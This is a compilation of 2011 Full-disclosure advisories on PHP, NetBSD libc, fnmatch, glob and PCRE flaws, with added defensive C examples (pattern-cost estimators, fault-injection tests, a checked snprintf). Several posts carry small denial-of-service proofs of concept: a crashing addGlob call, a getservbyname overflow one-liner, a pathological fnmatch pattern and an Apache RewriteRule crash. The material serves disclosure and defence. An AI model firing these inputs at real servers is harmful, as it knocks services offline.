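Both the glob(3) brace patterns in the FreeBSD ftpd post above and the nested bounded repetitions in this regcomp(3) post (the eregi() pattern in the PHP memory_limit post is the same shape) blow up by multiplication: every extra `{a,b}` doubles the expansion, every extra `{1,100}` layer multiplies the macro-expanded size by 100. Where the pattern comes from an untrusted source and the library cannot be patched, a cheap defence is to estimate that product and refuse the pattern before it reaches glob() or regcomp(). The following is an added example of such a pre-flight estimator, my code rather than FreeBSD's, NetBSD's or PHP's; the two limits are my choice (the post only says 128MB per regcomp() call), bracket expressions are treated as plain characters, and parentheses nested deeper than 128 are counted as literals.

```c
/* Added example: pre-flight expansion-cost estimators for glob(3) brace
 * alternation and regcomp(3) bounded repetition. My code; thresholds are
 * illustrative choices, not values from the posts. */
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define COST_INF UINT64_MAX                  /* saturated: far too big */
#define GLOB_EXPANSION_LIMIT 16384ULL        /* my choice */
#define REGEX_NODE_LIMIT     (1ULL << 20)    /* my choice: ~1M expanded nodes */
#define MAX_DEPTH 128

static uint64_t sat_mul(uint64_t a, uint64_t b)
{
    if (a == 0 || b == 0) return 0;
    return (a > COST_INF / b) ? COST_INF : a * b;
}
static uint64_t sat_add(uint64_t a, uint64_t b)
{
    return (a > COST_INF - b) ? COST_INF : a + b;
}

/* ---- GLOB_BRACE: how many strings "{a,b}{c,d}" expands to (2*2 = 4) ---- */
static uint64_t brace_seq(const char **p, int depth);

/* *p at '{': sum of the alternatives, consumed through the matching '}'. */
static uint64_t brace_group(const char **p, int depth)
{
    uint64_t sum = 0;
    (*p)++;
    for (;;) {
        sum = sat_add(sum, brace_seq(p, depth + 1));
        if (**p == ',') { (*p)++; continue; }
        if (**p == '}') (*p)++;              /* an unterminated group ends at NUL */
        return sum;
    }
}

/* Product of the groups in a sequence; inside braces it stops at ',' or '}'. */
static uint64_t brace_seq(const char **p, int depth)
{
    uint64_t prod = 1;
    while (**p != '\0') {
        if (**p == '{') { prod = sat_mul(prod, brace_group(p, depth)); continue; }
        if (depth > 0 && (**p == ',' || **p == '}')) break;
        if (**p == '\\' && (*p)[1] != '\0') (*p)++;   /* escaped metacharacter */
        (*p)++;
    }
    return prod;
}

uint64_t glob_brace_expansions(const char *pattern)
{
    const char *p = pattern;
    return brace_seq(&p, 0);
}

/* ---- regcomp(3): size after macro expansion of bounded repetitions ----
 * Each atom costs 1, "(...)" costs its contents, "{m,n}" multiplies the
 * preceding atom by n ("{m,}" by m); '*', '+', '?' are not expanded. */
uint64_t regex_repeat_cost(const char *pattern)
{
    struct frame { uint64_t cur, last; } st[MAX_DEPTH];
    int sp = 0;
    uint64_t cur = 0, last = 0;               /* running total; cost of last atom */
    const char *p = pattern;
    while (*p) {
        if (*p == '(' && sp < MAX_DEPTH) {
            st[sp++] = (struct frame){ cur, last };
            cur = 0; last = 0; p++;
        } else if (*p == ')' && sp > 0) {
            uint64_t inner = cur;
            cur = sat_add(st[--sp].cur, inner); last = inner; p++;
        } else if (*p == '{') {
            char *end, *e2;
            unsigned long m = strtoul(p + 1, &end, 10), n = m;
            if (*end == ',') { n = strtoul(end + 1, &e2, 10); if (e2 == end + 1) n = m; end = e2; }
            if (end > p + 1 && *end == '}') {          /* well-formed bound */
                uint64_t rep = sat_mul(last, n);
                cur = sat_add(cur - last, rep); last = rep; p = end + 1;
            } else { cur = sat_add(cur, 1); last = 1; p++; }   /* literal '{' */
        } else if (*p == '*' || *p == '+' || *p == '?') {
            p++;
        } else {
            if (*p == '\\' && p[1]) p++;
            cur = sat_add(cur, 1); last = 1; p++;
        }
    }
    return cur;
}

/* Policy: 1 = hand it to glob()/regcomp(), 0 = reject before compiling. */
int glob_pattern_ok(const char *pattern)  { return glob_brace_expansions(pattern) <= GLOB_EXPANSION_LIMIT; }
int regex_pattern_ok(const char *pattern) { return regex_repeat_cost(pattern) <= REGEX_NODE_LIMIT; }

/* n copies of "{a,b}" (the shape used against ftpd) -> estimated expansions. */
uint64_t brace_groups_cost(int n)
{
    char *buf = malloc((size_t)n * 5 + 1);
    if (buf == NULL) return 0;
    for (int i = 0; i < n; i++) memcpy(buf + i * 5, "{a,b}", 5);
    buf[n * 5] = '\0';
    uint64_t c = glob_brace_expansions(buf);
    free(buf);
    return c;
}
```

Forty-eight `{a,b}` groups estimate to 2^48 strings, which is why a fixed cap on the number of results (what GLOB_LIMIT is meant to provide) is the right shape of defence even when the pattern is syntactically tiny; the regex estimator saturates on the 100-plus nested `{1,2}` levels of the eregi() PoC long before any allocation happens.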
Re: [Full-disclosure] New Opera 11.51 PoC Denial of Service (pigtail23)
Stack exhaustion. It seems to be a recursion problem for basic regular expressions. The same or similar problem exists in PCRE 8.12, allowing crashing multiple applications:

cx@cx64:/www$ cat crash0.php
cx@cx64:/www$ php crash0.php
Segmentation fault

or some time ago for apache,

127# cat .htaccess
RewriteEngine On
RewriteBase /rcrash
RewriteRule gun((.*){2000,}(\s*){2000,}.*) /ygy
127# curl http://127.0.0.1/rcrash/gun
curl: (52) Empty reply from server

[Mon Jul 11 02:40:39 2011] [notice] child pid 1343 exit signal Illegal instruction (4)

Program received signal SIGSEGV, Segmentation fault.
0x08097a9b in match (eptr=0xbb777b07 "", ecode=0xbb76ab6f "*\bB", offset_top=8, md=0xbfbfe284, ims=0, eptrb=0xbfa02014, flags=2) at pcre.c:7997
7997	    c = *ecode++ - OP_TYPESTAR;

That is the same problem.

-- Best Regards
pub 4096R/D6E5B530 2010-09-19
uid Maksymilian Arciemowicz (cx)
sub 4096R/58BA663C 2010-09-19
Re: [Full-disclosure] Symlink vulnerabilities
On 10/22/2011 11:14 AM, full-disclosure-requ...@lists.grok.org.uk wrote:
> If you had your way, would you see it implemented as /tmp/
> //tmp, or some other way?

per_user_tmp=yes ?
http://www.feyrer.de/NetBSD/bx/blosxom.cgi/index.front?-tags=tmp

-- Best Regards
pub 4096R/D6E5B530 2010-09-19
uid Maksymilian Arciemowicz (cx)
sub 4096R/58BA663C 2010-09-19
[Full-disclosure] PHP 5.3.6 multiple null pointer dereference
[ PHP 5.3.6 multiple null pointer dereference ]

Author: Maksymilian Arciemowicz
http://securityreason.com/
http://securityreason.net/
http://cxib.net/

Date:
- Dis.: 20.07.2011
- Pub.: 19.08.2011

Affected Software (verified):
PHP 5.3.6 and prior

Fixed: PHP 5.3.7

Original URL: http://securityreason.com/achievement_securityalert/101

--- 0. Description ---
PHP is a general-purpose scripting language originally designed for web development to produce dynamic web pages. For this purpose, PHP code is embedded into the HTML source document and interpreted by a web server with a PHP processor module, which generates the web page document. It also has evolved to include a command-line interface capability and can be used in standalone graphical applications.

--- 1. PHP 5.3.6 multiple null pointer dereference ---
Some time ago we reported a list of possible NULL pointer dereferences in PHP 5.3.6. If a user may change the size of a malloc, it's possible to get NULL pointer dereferences. I haven't had enough time to check the security impact of all these bugs.

To demonstrate these flaws, we may use the default memory limit in OpenBSD [512MB]. We should allocate a lot of memory, like 510MB (still 2MB free). If some string is longer than 2MB (for example 4MB), and PHP tries to copy this string using malloc/strlen etc., then malloc returns NULL. Then the program continues with possible NULL pointer dereference or buffer overflow symptoms.

Example:
http://cwe.mitre.org/data/definitions/690.html
where CWE-690 gives CWE-476 NULL pointer dereference.

A good example of CWE-690 is

	tz->location.comments = malloc(comments_len + 1);
	memcpy(tz->location.comments, *tzf, comments_len);

This code may lead to a null pointer dereference, or a simple crash nulling memory with memset():

	in.str = malloc((e - s) + YYMAXFILL);
	memset(in.str, 0, (e - s) + YYMAXFILL);
	memcpy(in.str, s, (e - s));

Program received signal SIGSEGV, Segmentation fault.
0xbba7581c in memset () from /usr/lib/libc.so.12
(gdb) x/i $eip
0xbba7581c :	rep stos %eax,%es:(%edi)
(gdb) x/x $eax
0x0:	Cannot access memory at address 0x0
(gdb) x/x $edi
0x0:	Cannot access memory at address 0x0

In this case, memset() overwrites the memory with the 0x0 char. If an attacker can put something other than 0x0, it would have a security impact. There are more interesting places where a user may try to change the size of a malloc. See below:

-id0-start-
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/curl/interface.c?view=markup
820 	if (!CRYPTO_get_id_callback()) {
821 		int i, c = CRYPTO_num_locks();
822
823 		php_curl_openssl_tsl = malloc(c * sizeof(MUTEX_T));
824
825 		for (i = 0; i < c; ++i) {
826 			php_curl_openssl_tsl[i] = tsrm_mutex_alloc();
827 		}
828
829 		CRYPTO_set_id_callback(php_curl_ssl_id);
830 		CRYPTO_set_locking_callback(php_curl_ssl_lock);
831 	}
-id0-end-

-id1-start-
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/date/lib/parse_date.c?view=markup
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/date/lib/parse_iso_intervals.c?view=markup
multiple malloc/calloc/realloc
323 	uchar *buf = (uchar*) malloc(((s->lim - s->bot) + BSIZE)*sizeof(uchar));
324 	memcpy(buf, s->tok, s->lim - s->tok);

496 	str = calloc(1, end - begin + 1);
497 	memcpy(str, begin, end - begin);

346 	s->errors->warning_messages = realloc(s->errors->warning_messages, s->errors->warning_count * sizeof(timelib_error_message));
347 	s->errors->warning_messages[s->errors->warning_count - 1].position = s->tok ? s->tok - s->str : 0;
348 	s->errors->warning_messages[s->errors->warning_count - 1].character = s->tok ? *s->tok : 0;
349 	s->errors->warning_messages[s->errors->warning_count - 1].message = strdup(error);
-id1-end-

-id2-start-
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/date/lib/parse_tz.c?view=markup
210 	tz->location.comments = malloc(comments_len + 1);
211 	memcpy(tz->location.comments, *tzf, comments_len);
212 	tz->location.comments[comments_len] = '\0';
213 	*tzf += comments_len;
-id2-end-

-id3-start-
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/date/lib/timelib.c?revision=305315&view=markup
124 	tmp->trans = (int32_t *) malloc(tz->timecnt * sizeof(int32_t));
125 	tmp->trans_idx = (unsigned char*) malloc(tz->timecnt * sizeof(unsigned char));
126 	memcpy(tmp->trans, tz->trans, tz->timecnt * sizeof(int32_t));
127 	memcpy(tmp->trans_idx, tz->trans_idx, tz->timecnt * sizeof(unsigned char));
128
129 	tmp->
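This post and the PHP 5.3.8 zend_strndup() post above describe the same defect class (CWE-690): malloc() returns NULL under memory pressure and the caller uses the result without a check. The posts reproduce it with ulimit and a near-exhausted heap; in a unit test the same path is reached more directly by letting the allocator fail on demand. The following is an added example (my code, not PHP's) of that fault-injection technique around a strndup-style helper, showing the unchecked caller beside the checked one. The names `xstrndup`, `define_constant_checked`, `define_constant_unchecked` and the allocator hook are mine.

```c
/* Added example: allocation fault injection for a zend_strndup()-style
 * helper. Not PHP code; names are mine. */
#include <stdlib.h>
#include <string.h>

/* Allocator hook: production code uses malloc; a test swaps in one that fails. */
static void *(*alloc_hook)(size_t) = malloc;

/* Same contract as zend_strndup() in the post: NULL when allocation fails. */
char *xstrndup(const char *s, size_t length)
{
    char *p = alloc_hook(length + 1);
    if (p == NULL)
        return NULL;
    if (length)
        memcpy(p, s, length);
    p[length] = '\0';
    return p;
}

struct constant {
    char *name;
    size_t name_len;
};

/* Checked caller (the fix): report failure instead of storing a NULL name. */
int define_constant_checked(struct constant *c, const char *name, size_t len)
{
    c->name = xstrndup(name, len);
    if (c->name == NULL) {
        c->name_len = 0;
        return -1;
    }
    c->name_len = len + 1;
    return 0;
}

/* Shape of the bug in ZEND_FUNCTION(define): the copy is consumed without a
 * check, so a failed allocation reaches strrchr(NULL, ...), which is frame #0
 * in the backtrace of the 5.3.8 post. Shown for contrast only; never run it
 * with the failing allocator installed. */
int define_constant_unchecked(struct constant *c, const char *name, size_t len)
{
    c->name = xstrndup(name, len);
    c->name_len = len + 1;
    return strrchr(c->name, ':') != NULL;   /* dereferences NULL on failure */
}

/* --- fault injection: allow k allocations, then fail ------------------- */
static int allocs_before_failure;

static void *failing_alloc(size_t n)
{
    if (allocs_before_failure-- <= 0)
        return NULL;
    return malloc(n);
}

/* Drives the checked caller with its first allocation failing. Returns the
 * caller's return code (the hardened path gives -1) and leaks nothing. */
int checked_path_under_alloc_failure(void)
{
    struct constant c = { NULL, 0 };
    allocs_before_failure = 0;
    alloc_hook = failing_alloc;
    int rc = define_constant_checked(&c, "MY_CONST", 8);
    alloc_hook = malloc;
    free(c.name);                           /* free(NULL) is a no-op */
    return rc;
}

/* Happy path with the real allocator: returns the stored name_len (9), or -1
 * if the copy failed or does not round-trip. */
int checked_path_normal(void)
{
    struct constant c = { NULL, 0 };
    if (define_constant_checked(&c, "MY_CONST", 8) != 0)
        return -1;
    int ok = strcmp(c.name, "MY_CONST") == 0;
    size_t n = c.name_len;
    free(c.name);
    return ok ? (int)n : -1;
}

int main(void)
{
    return (checked_path_normal() == 9 && checked_path_under_alloc_failure() == -1) ? 0 : 1;
}
```

The hook is what makes the NULL branch testable at all: without it, the only way to reach it is the ulimit dance in the post, and a missing check in any of the listed call sites stays invisible until a production host runs out of memory.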
[Full-disclosure] PHP 5.3.6 ZipArchive invalid use glob(3)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ PHP 5.3.6 ZipArchive invalid use glob(3) ] Author: Maksymilian Arciemowicz http://securityreason.com/ http://securityreason.net/ http://cxib.net/ Date: - - Dis.: 01.04.2011 - - Pub.: 19.08.2011 CVE: CVE-2011-1657 Affected Software (verified): PHP 5.3.6 and prior Fixed: PHP 5.3.7 Original URL: http://securityreason.com/achievement_securityalert/100 - --- 0.Description --- PHP is a general-purpose scripting language originally designed for web development to produce dynamic web pages. For this purpose, PHP code is embedded into the HTML source document and interpreted by a web server with a PHP processor module, which generates the web page document. It also has evolved to include a command-line interface capability and can be used in standalone graphical applications. ZipArchive This extension enables you to transparently read or write ZIP compressed archives and the files inside them. - --- 1. PHP 5.3.6 ZipArchive invalid use glob(3) --- Functions like addGlob and addPattern are not described in documentation. Anyway we can call to ZipArchive::addGlob and ZipArchive::addPattern in PHP 5.3.6 http://pl2.php.net/manual/en/class.ziparchive.php let's see ext/zip/php_zip.c 531 if (0 != (ret = glob(pattern, flags & GLOB_FLAGMASK, NULL, &globbuf))) { ... 1629/* 1 == glob, 2==pcre */ 1630if (type == 1) { 1631if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|la", 1632&pattern, &pattern_len, &flags, &options) == FAILURE) { 1633return; 1634} 1635} else { 1636if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|sa", 1637&pattern, &pattern_len, &path, &path_len, &options) == FAILURE) { 1638return; 1639} 1640} 1641 invalid &flags may provide to crash. To use flags like GLOB_ALTDIRFUNC, we should first declare gl_opendir, gl_closedir, gl_lstat, gl_stat. In PHP we only have 508 glob_t globbuf; ... 
530 globbuf.gl_offs = 0; 531 if (0 != (ret = glob(pattern, flags & GLOB_FLAGMASK, NULL, &globbuf))) { for addglob() there are no GLOB flags validation like in php/glob(). Only flags like GLOB_MARK|GLOB_NOSORT|GLOB_NOCHECK|GLOB_NOESCAPE|GLOB_BRACE|GLOB_ONLYDIR|GLOB_ERR should be allowed: - - GLOB_MARK - Adds a slash to each directory returned - - GLOB_NOSORT - Return files as they appear in the directory (no sorting) - - GLOB_NOCHECK - Return the search pattern if no files matching it were found - - GLOB_NOESCAPE - Backslashes do not quote metacharacters - - GLOB_BRACE - Expands {a,b,c} to match 'a', 'b', or 'c' - - GLOB_ONLYDIR - Return only directory entries which match the pattern - - GLOB_ERR - Stop on read errors (like unreadable directories), by default errors are ignored. - ---linux/ubuntu--- cx@cx64:~$ php -v PHP 5.3.3-1ubuntu9.3 with Suhosin-Patch (cli) (built: Jan 12 2011 16:07:38) Copyright (c) 1997-2009 The PHP Group Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies cx@cx64:~$ uname -a Linux cx64 2.6.35-28-generic #49-Ubuntu SMP Tue Mar 1 14:39:03 UTC 2011 x86_64 GNU/Linux cx@cx64:/www$ cat zip.php open("empty.zip");$nx->addGlob(str_repeat("*",33),0x39); ?>cx@cx64:/www$ php zip.php Segmentation fault - ---linux/ubuntu--- Tested with NetBSD glob(3) implementation (netbsd 5.1 and PHP 5.3.6) - ---bsd/netbsd--- unlink("empty.zip"); fopen("empty.zip","a"); $nx=new ZipArchive();$nx->open("empty.zip");$nx->addGlob(str_repeat("A",100),0x39); Program received signal SIGSEGV, Segmentation fault. 
0xbb86bb12 in realloc () from /usr/lib/libc.so.12
(gdb) i r
eax            0x410041         4259905
ecx            0xc              12
edx            0xbfb00000       -1078984704
ebx            0xbb8c81f4       -1148419596
esp            0xbfbfa980       0xbfbfa980
ebp            0xbfbfa9d8       0xbfbfa9d8
esi            0xfc000          1032192
edi            0x0              0
eip            0xbb86bb12       0xbb86bb12
(gdb) x/i $eip
0xbb86bb12 :    mov    0x8(%eax),%edi
(gdb) x/i $eax
0x410041:       Cannot access memory at address 0x410041
---bsd/netbsd---

And now try 'B':

---bsd/netbsd---
unlink("empty.zip");
fopen("empty.zip","a");
$nx=new ZipArchive();$nx->open("empty.zip");$nx->addGlob(str_repeat("B",100),0x39);

(gdb) x/i $eip
0xbb86bb12 :    mov    0x8(%eax),%edi
(gdb) x/i $eax
0x420042:       Cannot access memory at address 0x420042
---bsd/netbsd---

For 'A' we get mov 0x8(%eax),%edi where eax=0x410041.
For 'B' we get mov 0x8(%eax),%edi where eax=0x420042.

And once again for eax=0x0:

---bsd/netbsd---
$nx=new ZipArchive();$nx->open("empty.zip");$nx->addGlob("aa",0x39);

Program received signal SIGSEGV, Segmentation fault.
0xbb8e2960 in pthread_mutex_lock () from /usr/lib/libpthread.so.0
(gdb) bt
#0
[Full-disclosure] NetBSD 5.1 libc/net multiple functions stack buffer overflow
[ NetBSD 5.1 libc/net multiple functions stack buffer overflow ]

Author: Maksymilian Arciemowicz
http://netbsd.org/donations/

Date:
- Dis.: 01.04.2011
- Pub.: 01.07.2011

CVE: CVE-2011-1656
CWE: CWE-121

Affected software:
- NetBSD 5.1 (fixed)

Affected functions:
- getservbyname(3)
- getservbyname_r(3)
- getservbyport(3)
- getservbyport_r(3)
- getaddrinfo(3)
- getnameinfo(3)

Original URL: http://securityreason.com/achievement_securityalert/99

--- 0. Description ---

The getservbyname() and getservbyport() functions each return a pointer to an object with the following structure containing the broken-out fields of a line in the network services data base:

struct servent * getservbyname(const char *name, const char *proto);
struct servent * getservbyport(int port, const char *proto);

The getservbyname() and getservbyport() functions sequentially search from the beginning of the file until a matching protocol name or port number is found, or until EOF is encountered. If a protocol name is also supplied (non-NULL), searches must also match the protocol.

--- 1. NetBSD 5.1 libc/net multiple functions stack buffer overflow ---

The main problem exists in files like getservbyname_r.c and getservbyport_r.c. The functions getservbyname*(3), getservbyport*(3) and getaddrinfo(3) of the NetBSD libc implementation lead to a possible buffer overflow. To demonstrate this issue, we may use PHP as an attack vector.

127# php -r 'getservbyname("A",str_repeat("A",7108));'
127# php -r 'getservbyname("A",str_repeat("A",7109));'
Memory fault (core dumped)

-php-5.3.6/ext/standard/basic_functions.c---
PHP_FUNCTION(getservbyname)
{
	char *name, *proto;
	int name_len, proto_len;
	struct servent *serv;

	if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "ss", &name, &name_len, &proto, &proto_len) == FAILURE) {
		return;
	}
...
	serv = getservbyname(name, proto);  <== CALL TO LIBC
-php-5.3.6/ext/standard/basic_functions.c---

BT:
#0  0xbb8b2d65 in __log2 () from /usr/lib/libc.so.12
#1  0xbb8afa2e in __call_hash () from /usr/lib/libc.so.12
#2  0xbb8b0ebd in __hash_open () from /usr/lib/libc.so.12
#3  0xbb8884c2 in getservbyname_r () from /usr/lib/libc.so.12
#4  0xbb822f6f in getservbyname () from /usr/lib/libc.so.12
#5  0x08334458 in php_get_highlight_struct ()

Let's see what is wrong with getservbyname().

-getservbyname.c---
struct servent *
getservbyname(const char *name, const char *proto)
{
	struct servent *s;

	mutex_lock(&_servent_mutex);
	s = getservbyname_r(name, proto, &_servent_data.serv, &_servent_data);  <=== REFERENCE
	mutex_unlock(&_servent_mutex);
	return (s);
}
-getservbyname.c---

As we can see, getservbyname(3) redirects to the getservbyname_r(3) function.

-getservbyname_r.c---
	if (sd->flags & _SV_DB) {
		char buf[BUFSIZ];
		DBT key, data;
		DB *db = sd->db;

		key.data = buf;
		if (proto == NULL)
			key.size = snprintf(buf, sizeof(buf), "\376%s", name);  <= INVALID key.size HERE
		else
			key.size = snprintf(buf, sizeof(buf), "\376%s/%s",  <= INVALID key.size HERE
			    name, proto);
		key.size++;

		if ((*db->get)(db, &key, &data, 0) != 0)
			return NULL;
		if ((*db->get)(db, &data, &key, 0) != 0)
			return NULL;
-getservbyname_r.c---

key.size may be bigger than BUFSIZ. snprintf(3) returns the number of characters that would have been written had size been sufficiently large (not counting the terminating null). In this case, snprintf(3) returns a bigger value than sizeof(buf). In older libc implementations, snprintf(3) would return -1 if the string is truncated.

The same problem exists in getservbyport_r(3).
-getservbyname_r.c---
	if (sd->flags & _SV_DB) {
		char buf[BUFSIZ];
		DBT key, data;
		DB *db = sd->db;

		key.data = buf;
		port = htons(port);
		if (proto == NULL)
			key.size = snprintf(buf, sizeof(buf), "\377%d", port);  <= INVALID key.size HERE
		else
			key.size = snprintf(buf, sizeof(buf), "\377%d/%s", port,  <= INVALID key.size HERE
			    proto);
		key.size++;

		if ((*db->get)(db, &key, &data, 0) != 0)
			return NULL;
		if ((*db->get)(
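As an added example (this is not NetBSD's libc code and is not part of the advisory), here is the same key construction with the check the two snippets above lack: the value snprintf(3) returns is compared against the buffer size before it is used as a length. build_service_key(), service_key_size() and KEY_BUF_SIZE are constructed names; KEY_BUF_SIZE stands in for BUFSIZ and is deliberately small so that the truncation case is easy to reach.

```c
#include <stdio.h>
#include <string.h>

/* Constructed stand-in for the char buf[BUFSIZ] in getservbyname_r(); kept
 * small so the truncation case is easy to trigger in a test. */
#define KEY_BUF_SIZE 64

/* Build the lookup key "\376name/proto" (or "\376name" when proto is NULL)
 * into buf, exactly as getservbyname_r() does. Returns the key length
 * including the trailing NUL (the value the original stores in key.size),
 * or 0 when the key would not fit in buf. */
size_t build_service_key(char *buf, size_t bufsize,
                         const char *name, const char *proto)
{
    int n;

    if (proto == NULL)
        n = snprintf(buf, bufsize, "\376%s", name);
    else
        n = snprintf(buf, bufsize, "\376%s/%s", name, proto);

    /* C99 snprintf() returns the length the full string would have had, so
     * n >= bufsize means the output was truncated and n no longer describes
     * what is in buf. Passing such an n on as key.size is the advisory's
     * bug: the database lookup then reads past the end of buf. */
    if (n < 0 || (size_t)n >= bufsize)
        return 0;

    return (size_t)n + 1;   /* include the NUL, as the original key.size++ does */
}

/* Wrapper with a fixed-size stack buffer, mirroring the original's
 * char buf[BUFSIZ]. Returns the key size, or 0 when the inputs are too
 * long to be looked up safely. */
size_t service_key_size(const char *name, const char *proto)
{
    char buf[KEY_BUF_SIZE];
    return build_service_key(buf, sizeof buf, name, proto);
}
```

The caller treats 0 as "not found" rather than continuing with a bogus length, which is the behaviour a lookup routine should have for an over-long service or protocol name.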
[Full-disclosure] Multiple Vendors libc/fnmatch(3) DoS (incl apache poc)
[ Multiple Vendors libc/fnmatch(3) DoS (incl apache poc) ]

Author: Maksymilian Arciemowicz
http://netbsd.org/donations/
http://securityreason.com/
http://cxib.net/

Date:
- Dis.: 29.01.2011
- Pub.: 13.05.2011

CVE: CVE-2011-0419
CWE: CWE-399

Affected Software (verified):
- Apache 2.2.17
- NetBSD 5.1
- OpenBSD 4.8
- FreeBSD
- MacOSX 10.6
- SunSolaris 10

Original URL: http://securityreason.com/achievement_securityalert/98

--- 0. Description ---

fnmatch -- match filename or pathname using shell glob rules

SYNOPSIS
#include <fnmatch.h>

int fnmatch(const char *pattern, const char *string, int flags);

--- 1. Multiple Vendors libc/fnmatch(3) DoS (incl apache poc) ---

An attacker who can modify the first and second parameters (pattern, string) of fnmatch(3) may cause CPU resource exhaustion. To see the huge complexity of the problem, try to compile the code below:

fnmatch("?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*","xx",0);

fnmatch should return an answer quickly, logically an int.

-fnmatch()/netbsd/fnmatch.c--
		/* Collapse multiple stars. */
		while (c == '*')
			c = FOLDCASE(*++pattern, flags);
-fnmatch()/netbsd/fnmatch.c--

fnmatch() skips multiple stars here. It protects us from patterns like "...", but not from "*?*?*?*?*?*?*?*?*?*?*?...". Let's see what will happen if we use a single star in the pattern:

-fnmatch()/netbsd/fnmatch.c--
		case '*':
			c = FOLDCASE(*pattern, flags);
			/* Collapse multiple stars. */
			while (c == '*')
				c = FOLDCASE(*++pattern, flags);

			if (*string == '.' && (flags & FNM_PERIOD) &&
			    (string == stringstart ||
			    ((flags & FNM_PATHNAME) && *(string - 1) == '/')))
				return (FNM_NOMATCH);
...
			/* General case, use recursion. */
			while ((test = FOLDCASE(*string, flags)) != EOS) {
				if (!fnmatch(pattern, string,  <== RECURSION
				    flags & ~FNM_PERIOD))
					return (0);
				if (test == '/' && flags & FNM_PATHNAME)
					break;
				++string;
			}
			return (FNM_NOMATCH);
-fnmatch()/netbsd/fnmatch.c--

The recursion in this code:

				if (!fnmatch(pattern, string,  <=== RECURSION WITHOUT LIMITS

may cause a denial of service. Some recursion limit is missing here. A fix has been created together with NetBSD and should work on all BSD implementations of fnmatch(3). To fix it, limit recursion_level to 64, because it guarantees a quick result, e.g.:

-fix---
...
static int
fnmatchx(const char *pattern, const char *string, int flags, size_t recursion)  <=== ADD ( size_t recursion )
{
	const char *stringstart;
	char c, test;

	_DIAGASSERT(pattern != NULL);
	_DIAGASSERT(string != NULL);

	if (recursion-- == 0)  <=== DECREMENT recursion_level
		return FNM_NORES;
...
int
fnmatch(const char *pattern, const char *string, int flags)
{
	return fnmatchx(pattern, string, flags, 64);  <=== SET recursion_level HERE
}
...
-fix---

This fix limits the max recursion level to 64. Any bigger value may be unsafe.

To demonstrate these flaws, I'm using apache with mod_autoindex because it's the best vector here. There are two ways to denial of service, local and remote.

IMPORTANT:
fnmatch(const char *pattern, const char *string, int flags);
strlen(string) should be smaller than strlen(pattern)

Let's start.

-apache.2.2.17;apr_fnmatch();srclib/apr/strings/apr_fnmatch.c---
...
            /* Collapse multiple stars. */
            while (c == '*') {
                c = *++pattern;
            }
...
            /* General case, use recursion. */
            while ((test = *string) != EOS) {
                if (!apr_fnmatch(pattern, string, flags & ~APR_FNM_PERIOD)) {  <=== RECURSION
                    return (APR_SUCCESS);
...
-apache.2.2.17;apr_fnmatch();srclib/apr/strings/apr_fnmatch.c---

This is the BSD implementation of
[Full-disclosure] Multiple Vendors libc/glob() GLOB_BRACE|GLOB_LIMIT memory exhaustion
[ Multiple Vendors libc/glob() GLOB_BRACE|GLOB_LIMIT memory exhaustion ]

Author: Maksymilian Arciemowicz
http://netbsd.org/donations/
http://securityreason.com/
http://cxib.net/

Date:
- Dis.: 19.01.2011
- Pub.: 02.05.2011

CVE: CVE-2011-0418

Affected Software (verified):
- NetBSD 5.1
- and more

Original URL: http://securityreason.com/achievement_securityalert/97

--- 0. Description ---

#include <glob.h>

int glob(const char *pattern, int flags, int (*errfunc)(const char *epath, int eerrno), glob_t *pglob);

Description: This function expands a filename wildcard which is passed as pattern.

GLOB_LIMIT: Limit the amount of memory used by matches to ARG_MAX. This option should be set for programs that can be coerced to a denial of service attack via patterns that expand to a very large number of matches, such as a long string of */../*/..

--- 1. Multiple Vendors libc/glob(3) GLOB_BRACE|GLOB_LIMIT memory exhaustion ---

Analyzing the history of GLOB_LIMIT, we should start in 2001, when it was added to protect ftp servers from memory exhaustion.
http://www.mail-archive.com/bugtraq@securityfocus.com/msg04960.html

Any 'pattern' should be limited and controlled by GLOB_LIMIT. The algorithm used in glob(3) is not optimal, and doesn't support functions like realpath() to eliminate duplicates. It's not easy to predict the greatest possible complexity. Anyway, in 2010 NetBSD extended GLOB_LIMIT with a few new limits like: stats, readdir and malloc. OpenBSD has localized some integer overflow.
In the glob(3) function, there exist some malloc() calls allowing allocate n
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gen/glob.c.diff?r1=1.34;r2=1.35;f=h

-globextend()/openbsd--
749:	newn = 2 + pglob->gl_pathc + pglob->gl_offs;
750:	if (pglob->gl_offs >= INT_MAX ||
751:	    pglob->gl_pathc >= INT_MAX ||
752:	    newn >= INT_MAX ||
753:	    SIZE_MAX / sizeof(*pathv) <= newn ||
754:	    SIZE_MAX / sizeof(*statv) <= newn) {
755: nospace:
756:		for (i = pglob->gl_offs; i < (ssize_t)(newn - 2); i++) {
757:			if (pglob->gl_pathv && pglob->gl_pathv[i])
758:				free(pglob->gl_pathv[i]);
759:			if ((pglob->gl_flags & GLOB_KEEPSTAT) != 0 &&
760:			    pglob->gl_pathv && pglob->gl_pathv[i])
761:				free(pglob->gl_statv[i]);
762:		}
763:		if (pglob->gl_pathv) {
764:			free(pglob->gl_pathv);
765:			pglob->gl_pathv = NULL;
766:		}
767:		if (pglob->gl_statv) {
768:			free(pglob->gl_statv);
769:			pglob->gl_statv = NULL;
770:		}
771:		return(GLOB_NOSPACE);
772:	}
-globextend()/openbsd--

